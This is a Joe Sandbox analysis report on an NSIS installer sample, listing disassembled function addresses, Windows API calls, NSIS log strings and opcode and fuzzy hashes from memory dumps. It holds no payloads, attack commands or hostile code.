String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033E7
GetTickCount.KERNEL32 ref: 00403464
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
wsprintfW.USER32 ref: 004034A4
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A

Strings

X1C, xrefs: 0040343C
X1C, xrefs: 004033ED
... %d%%, xrefs: 0040349E
P1B, xrefs: 004033A9

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(00000000), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
LoggingRise, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$LoggingRise$Pop: stack empty
API String ID: 1459762280-2130329580
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(00000000), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
LoggingRise, xrefs: 00402770

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$LoggingRise$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-700257363
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
